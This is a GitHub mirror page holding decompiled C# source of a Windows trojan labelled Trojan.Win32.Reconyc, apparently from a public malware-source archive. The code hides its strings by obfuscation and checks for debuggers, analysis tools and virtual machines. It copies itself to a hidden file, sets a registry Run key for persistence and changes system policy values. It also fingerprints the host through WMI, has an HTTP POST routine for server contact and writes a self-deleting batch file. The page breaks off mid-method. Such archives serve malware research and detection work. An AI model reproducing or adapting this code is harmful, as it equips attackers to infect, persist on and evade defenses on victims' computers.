ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/R/Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87/_003F1_003F.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

1063 lines
53 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: ?1?.?1?
// Assembly: svchost, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0572F6A4-2AE0-441B-8B88-3FB3343AE211
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87.exe
using \u003F1\u003F;
using Microsoft.Win32;
using System;
using System.Collections;
using System.Data;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Management;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
using System.Xml;
namespace \u003F1\u003F
{
internal class \u003F1\u003F
{
private static bool \u003F141\u003F = true;
private static bool \u003F142\u003F = true;
private static bool \u003F143\u003F = true;
private static bool \u003F144\u003F = true;
private static bool \u003F145\u003F = true;
private static bool \u003F146\u003F = true;
private static bool \u003F147\u003F = true;
private static bool \u003F148\u003F = true;
private static bool \u003F149\u003F = true;
private static bool \u003F150\u003F = true;
private static bool \u003F151\u003F = true;
private static bool \u003F152\u003F = true;
private static bool \u003F153\u003F = true;
private static bool \u003F154\u003F = true;
private static bool \u003F155\u003F = true;
private static string \u003F156\u003F = \u003F195\u003F.\u003F196\u003F("xżɪ͠Ѩյٱܪ\u0866ॺ\u0A64");
private static string[] \u003F157\u003F = new string[2]
{
\u003F195\u003F.\u003F196\u003F("ZŅɄ͟ДԂ\u0603݈ࡅेੜ\u0B55\u0C49\u0D49๗ཆၐᅗቅ\u136Dᐰᕿᙬ\u1777\u187B\u197A\u1A7D᭳\u1C38ᵻṱὧ‽Ⅱ≱⍡\u246F╡☣⡥⥧⩦⭢ⱥ\u2D71⸪⽳なㅱ"),
\u003F195\u003F.\u003F196\u003F("tůɮͩТԸعݠ\u0864ॷੳ\u0B65\u0C75ർรའၥᅨቸ፦ᑻᕨᙠ\u1771ᠪᥬᩰ᭦")
};
private static string \u003F158\u003F = \u003F195\u003F.\u003F196\u003F("2Ĭȱ");
private static string \u003F159\u003F = \u003F195\u003F.\u003F196\u003F("4");
private static string \u003F160\u003F = CultureInfo.CurrentUICulture.Name.Substring(3);
private static bool \u003F161\u003F = true;
private static string \u003F162\u003F = \u003F195\u003F.\u003F196\u003F("AšɯͣѸ");
private static bool \u003F163\u003F = false;
private static bool \u003F164\u003F = false;
private static bool \u003F165\u003F = false;
private static bool \u003F166\u003F = false;
private static bool \u003F167\u003F = true;
private static bool \u003F168\u003F = false;
private static string \u003F169\u003F = \u003F195\u003F.\u003F196\u003F("VŮɥͨщչٸݦ\u087Aॊ\u0A63\u0B76\u0C77ൢ\u0E65ཤ");
private static string \u003F170\u003F = \u003F195\u003F.\u003F196\u003F("HŬɧͮяջٺݨ\u0874॑੭\u0B77౮\u0D64");
private static string \u003F171\u003F = \u003F1\u003F.\u003F1\u003F.\u003F31\u003F(\u003F1\u003F.\u003F1\u003F.\u003F34\u003F());
private static bool \u003F172\u003F = false;
private static IntPtr \u003F173\u003F;
private static string \u003F174\u003F = string.Empty;
private static string \u003F175\u003F = Environment.MachineName;
private static \u003F4\u003F \u003F176\u003F = new \u003F4\u003F();
public static string \u003F177\u003F;
private static string \u003F178\u003F = string.Empty;
private static string \u003F179\u003F = \u003F1\u003F.\u003F1\u003F.\u003F35\u003F() + \u003F1\u003F.\u003F1\u003F.\u003F27\u003F();
public static bool \u003F26\u003F(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
public static string \u003F27\u003F()
{
string str = \u003F195\u003F.\u003F196\u003F("");
return !Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("fŌɞ͏ѝՈ݂ٚ\u087Aॡੁ\u0B50ు\u0D53้\u0F6Fၪᅴታ\u1375ᑆᕊᙡᝤᡢᥰ᩹\u1B4F᱑ᵴṾύ⁼≠⍛\u2478╦♫❢⡵⥶⩫⭱ⱞⴱ")).GetValue(\u003F195\u003F.\u003F196\u003F("CŭɭͩѲլ٢ݪ\u0867ॳ")).ToString().Contains(\u003F195\u003F.\u003F196\u003F("{ĺȷ")) ? str + \u003F195\u003F.\u003F196\u003F(")Ġȱ̲ХՆ٪ݶࠨ") : \u003F195\u003F.\u003F196\u003F(")Ġȴ̴ХՆ٪ݶࠨ");
}
public static string \u003F28\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("fűɿͷѲդ؏܄ࠍ४\u0A79\u0B65\u0C64ഈ\u0E70ཏ။ᄗሑ\u137Dᑱᕒᙰ\u177D\u1878\u196Fᩨ᭵ᱫᴸṀ\u1F5E⁐≖⌲\u2455╵♹❧⡮⥩⩂⭎Ⱙⴵ⸧⼡うㅔ\u3256㌲㐦"));
string str = \u003F195\u003F.\u003F196\u003F("");
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
str = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("[ŸɦͫѢյٶݫ\u0871ो\u0A65")]);
return str;
}
public static string \u003F29\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("pŧɭͥќՊؽܶ࠻ड़ੋୗౚശโཽၽᄡሣፏᑙᕧᙩᝩᡤ᥉ᩦ᭦ᱳᵴṪὨ\u206FⅧ≳"));
string str = \u003F195\u003F.\u003F196\u003F("");
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
str = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("Oůɺͫѵկٵݰ\u086A७੯")]);
return str;
}
public static string \u003F30\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("pŧɭͥќՊؽܶ࠻ड़ੋୗౚശโཽၽᄡሣፏᑙᕧᙩᝩᡤ᥉ᩦ᭦ᱳᵴṪὨ\u206FⅧ≳"));
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("Oůɺͫѵկٵݰ\u086A७੯")]);
return empty;
}
public static string \u003F31\u003F(string _param0)
{
switch (_param0)
{
case null:
return string.Empty;
default:
if (_param0.Length != 0)
{
byte[] hash = new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(_param0));
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u003F195\u003F.\u003F196\u003F("zij")));
return stringBuilder.ToString();
}
goto case null;
}
}
public static string \u003F32\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("Nřɗ͟њՌطܼ࠵॒ੁଢ଼\u0C5Cര๘ཧၣᄿሹፕᑋᕩᙴᝣᡇᥫᩢ᭰ᱥ"));
string str = \u003F195\u003F.\u003F196\u003F("");
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
str = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("_Ůɸ͠ѩիوݰ\u0869ॡ\u0B73")]);
return str;
}
[DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr \u003F33\u003F(IntPtr _param0, string _param1);
public static string \u003F34\u003F() => \u003F1\u003F.\u003F1\u003F.\u003F28\u003F() + \u003F1\u003F.\u003F1\u003F.\u003F29\u003F() + \u003F1\u003F.\u003F1\u003F.\u003F32\u003F();
public static string \u003F35\u003F()
{
OperatingSystem osVersion = Environment.OSVersion;
string str = \u003F195\u003F.\u003F196\u003F("");
if (osVersion.Platform == PlatformID.Win32Windows)
goto label_12;
label_2:
if (osVersion.Platform == PlatformID.Win32NT)
goto label_15;
label_10:
if (str == \u003F195\u003F.\u003F196\u003F(""))
goto label_19;
label_11:
return str;
label_19:
str = \u003F195\u003F.\u003F196\u003F("OŷɺͲѽմٺݽ\u0866ॴਰ\u0B58౧ൣ\u0E68ཤၽᅺሥፑᑣᕷᙷᝪᡭ\u196F");
goto label_11;
label_15:
if (osVersion.Version.Major == 4)
goto label_16;
label_3:
if (osVersion.Version.Major == 5)
goto label_17;
label_7:
if (osVersion.Version.Major == 6)
{
switch (osVersion.Version.Minor)
{
case 0:
str = \u003F195\u003F.\u003F196\u003F("ZťɥͮѦտٴܦࡓ७ੰ\u0B76ౠ");
goto label_10;
case 1:
str = \u003F195\u003F.\u003F196\u003F("^šɩ͢Ѫճٰܢ࠶");
goto label_10;
default:
goto label_10;
}
}
else
goto label_10;
label_17:
switch (osVersion.Version.Minor)
{
case 0:
str = \u003F195\u003F.\u003F196\u003F("[Ţɤͭѧհٵܥ࠶ळਲ\u0B31");
goto label_7;
case 1:
str = \u003F195\u003F.\u003F196\u003F("]Šɦͣѩղٷܣ࡚॑");
goto label_7;
case 2:
str = \u003F195\u003F.\u003F196\u003F("DŻɿʹѠչپܬࡘ९\u0A7B\u0B7Eౢ\u0D74ล༶ဳᄲሲ");
goto label_7;
default:
goto label_7;
}
label_16:
str = \u003F195\u003F.\u003F196\u003F("YŤɢͯѥվٻܧࡈ॑ਤଷబറ");
goto label_3;
label_12:
if (osVersion.Version.Minor == 10)
goto label_13;
label_1:
if (osVersion.Version.Minor == 90)
{
str = \u003F195\u003F.\u003F196\u003F("]Šɦͣѩղٷܣࡏ।");
goto label_2;
}
else
goto label_2;
label_13:
str = \u003F195\u003F.\u003F196\u003F("]Šɦͣѩղٷܣ࠻ह");
goto label_1;
}
private static string \u003F36\u003F(string _param0, string _param1)
{
ServicePointManager.Expect100Continue = true;
WebRequest webRequest = WebRequest.Create(_param0);
webRequest.ContentType = \u003F195\u003F.\u003F196\u003F("@ŐɯͲѴտٺݮ\u0870ॷ\u0A79ହ౭ഹ\u0E64ཥၦᄽቩ፡ᑿᕡᘦ\u177F\u187Bᥤᩢ᭨ᱦᵫṧὧ\u2065");
webRequest.Method = \u003F195\u003F.\u003F196\u003F("TŌɑ͕");
byte[] bytes = Encoding.ASCII.GetBytes(_param1);
webRequest.ContentLength = (long) bytes.Length;
Stream requestStream = webRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = webRequest.GetResponse();
return response != null ? new StreamReader(response.GetResponseStream()).ReadToEnd().Trim() : (string) null;
}
[DllImport("kernel32.dll", EntryPoint = "LoadLibrary")]
private static extern IntPtr \u003F37\u003F(string _param0);
private static void \u003F38\u003F(string[] _param0)
{
bool createdNew = false;
Mutex mutex = new Mutex(true, \u003F195\u003F.\u003F196\u003F("gĨȢ̬ЬԺاܡ࠹दਦଥతഢ\u0E3B༸းᄺሾጱᐰᔪᘲ\u1737ᠵᤲᨷ᭼"), out createdNew);
if (!createdNew)
return;
if (\u003F1\u003F.\u003F1\u003F.\u003F168\u003F)
{
try
{
new Thread(new ThreadStart(\u003F1\u003F.\u003F1\u003F.\u003F45\u003F)).Start();
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F142\u003F)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F143\u003F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F145\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("IŃɑ͗їՃٕ")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F150\u003F)
{
try
{
Form form = new Form();
form.Text = \u003F195\u003F.\u003F196\u003F("Pņɑ͕");
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u003F195\u003F.\u003F196\u003F("WĨɗ̩ќՂٕݑࠤक़ਡଡ଼"))
return;
form.Close();
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F144\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("Aŏɉ́юՍُ")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F148\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("WŔɊ͇юՍُ")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F149\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("TŀɃ͎эՏ")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F141\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("Głɋ͏")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F146\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("Hŀɐ͎эՏ")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F151\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("SŅɕ͒ъՇٖ")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F155\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("^Łɕ̓іՌقݐࡊ")))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F147\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == \u003F195\u003F.\u003F196\u003F("Gŷɧ͵ѿվٴݼ\u087Cमਜ਼\u0B65౯൯\u0E66༨၆ᅢቤ\u1374ᑷᕧᙳ"))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F154\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == \u003F195\u003F.\u003F196\u003F("XŀɻͪѸլبݔࡐू\u0A45ଣోൈ"))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F152\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == \u003F195\u003F.\u003F196\u003F("MųɫͬѢշٹݖ\u087C४\u0A31ୗ\u0C7D൯\u0E7Dཤၢᅩቺጨᑆᕢᙤ\u1774ᡷᥧᩳ"))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F153\u003F)
{
try
{
string[] strArray = new string[2]
{
\u003F195\u003F.\u003F196\u003F("Oŕȷ͗ѱհٺݦ\u0878ॿ\u0A61\u0B7Dభൟุ\u0F2Aၝᅺቮ\u1369ᐶᔶᘬ᜴ᠵ"),
\u003F195\u003F.\u003F196\u003F("_ĸȪ͝Ѻծ٩ܶ࠶ब\u0A34ଵ")
};
foreach (string str in strArray)
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == str)
return;
}
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F161\u003F)
{
try
{
Thread.Sleep(Convert.ToInt32(\u003F1\u003F.\u003F1\u003F.\u003F162\u003F) * 1000);
}
catch
{
}
}
try
{
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("hŕɟ͌р\u0557هݑ\u086Fॿ\u0A58\u0B53\u0C5Dു\u0E5Eགྷ၍ᅞት\u137Fᑎᕈᙁᝋᡔᥑ\u1A7D᭣ᱪᵬṯό\u2075≏⍽\u2465╥♼\u277B⡽⥎⩔⭨Ɀⵢ\u2E62⽾のㅸ\u3255㍉㑣㕰㙤㝪㡠㥧㩥"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŬɠͧѧկ"), (object) \u003F195\u003F.\u003F196\u003F("3"), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
System.IO.File.SetAttributes(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F, FileAttributes.Hidden);
}
catch
{
}
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F167\u003F)
Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"), (object) (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F));
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"), (object) (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F));
}
catch
{
}
if (\u003F1\u003F.\u003F1\u003F.\u003F167\u003F)
{
try
{
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("hŕɟ͌р\u0557هݑ\u086Fॿ\u0A58\u0B53\u0C5Dു\u0E5Eགྷ၍ᅞት\u137Fᑎᕈᙁᝋᡔᥑ\u1A7D᭣ᱪᵬṯό\u2075≏⍽\u2465╥♼\u277B⡽⥎⩔⭨Ɀⵢ\u2E62⽾のㅸ\u3255㍉㑣㕰㙤㝪㡠㥧㩥"), true).SetValue(\u003F195\u003F.\u003F196\u003F("Tžɮͬѡթىݫ\u0865।੨୩౫\u0D50\u0E6Aིၲ"), (object) \u003F195\u003F.\u003F196\u003F("1"), RegistryValueKind.DWord);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("LŦɦͤѩաُݗࡀ"), (object) \u003F195\u003F.\u003F196\u003F("1"), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("LŦɦͤѩաُݗࡀ"), (object) \u003F195\u003F.\u003F196\u003F("1"), RegistryValueKind.DWord);
}
catch
{
}
if (\u003F1\u003F.\u003F1\u003F.\u003F163\u003F)
{
if (Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬")) == null)
{
Registry.CurrentUser.CreateSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬"));
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŠɻͦѤթ١݀ࡏॅ"), (object) \u003F195\u003F.\u003F196\u003F("3"), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŠɻͦѤթ١݀ࡏॅ"), (object) \u003F195\u003F.\u003F196\u003F("3"), RegistryValueKind.DWord);
}
if (\u003F1\u003F.\u003F1\u003F.\u003F164\u003F)
{
try
{
new Process()
{
StartInfo = {
FileName = \u003F195\u003F.\u003F196\u003F("Kšɷͱѩ"),
Arguments = \u003F195\u003F.\u003F196\u003F("iŃɐ̓эՑهݖࡁॳੲଽ౯ൾ\u0E6E༹ၛᅢቤ፧ᑱᙦᝡᡢᥠᩨ᭤ᱠᵮḪ\u1F5A⁼Ⅶ≲⍠␤╬♤❧"),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F165\u003F)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬")) == null)
{
Registry.CurrentUser.CreateSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"));
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("PźɡͰѲգ٫ݟ\u0869६\u0A63\u0B7A\u0C7C\u0D75\u0E7Fདၫᅬቮ\u1372"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("PźɡͰѲգ٫ݟ\u0869६\u0A63\u0B7A\u0C7C\u0D75\u0E7Fདၫᅬቮ\u1372"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F166\u003F)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬")) == null)
{
Registry.CurrentUser.CreateSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"));
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("JŤɿͪѨե٭ݓ\u0867ॶ੯\u0B4E\u0C65\u0D73"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("JŤɿͪѨե٭ݓ\u0867ॶ੯\u0B4E\u0C65\u0D73"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
catch
{
}
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F172\u003F)
{
try
{
if (!Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑"))))
{
string str = \u003F195\u003F.\u003F196\u003F("6řɯ\u0379ѭզٲ\u070F\u0860੮ଡ") + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u003F195\u003F.\u003F196\u003F("\0Šɮ̧ѣս٭ݰ\u0876ड") + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u003F195\u003F.\u003F196\u003F(",Ŭɥͽѧԧٔݠ\u0874\u0A63\u0B75");
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ"));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ")),
UseShellExecute = false,
CreateNoWindow = true
}
